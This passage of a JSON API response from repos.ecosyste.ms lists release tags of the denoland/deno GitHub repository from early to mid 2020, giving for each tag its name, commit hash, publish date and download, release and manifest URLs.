s/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","